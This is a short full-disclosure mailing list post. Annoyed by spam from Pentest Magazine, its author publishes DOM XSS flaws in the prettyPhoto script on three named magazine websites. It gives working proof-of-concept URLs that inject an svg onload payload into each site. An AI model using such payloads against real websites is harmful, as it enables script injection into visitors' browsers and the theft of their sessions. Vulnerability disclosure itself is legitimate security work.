I have been annoyed lately by the staffs of Pentest Magazine because of their spam promotions and "Would you write for Us" inquiries despite saying no to their proposals. I don't like to write for them because they don't offer their services for free (Also they sell their magazines to other people yet they don't pay their writers - no just compensation ). So here is my full disclosure of Pentest Magazine, Data Recovery Magazine, and Software Developer's Journal which are all from the same company or somehow related. The official websites of the magazines mentioned are all vulnerable to DOM XSS because of the prettyPhoto js. PoC: http://datarecoverymag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/ http://pentestmag.com/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/ http://sdjournal.org/#!prettyPhoto/%3Csvg%20onload=%22prompt%28/jay%20was%20here/%29;%22%3E/ Attached are my screenshots. P.S. No harmed was done!
Attachment:
datarecovery.png
Description: PNG image
Attachment:
pentestmag.png
Description: PNG image
Attachment:
sdjournal.png
Description: PNG image
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
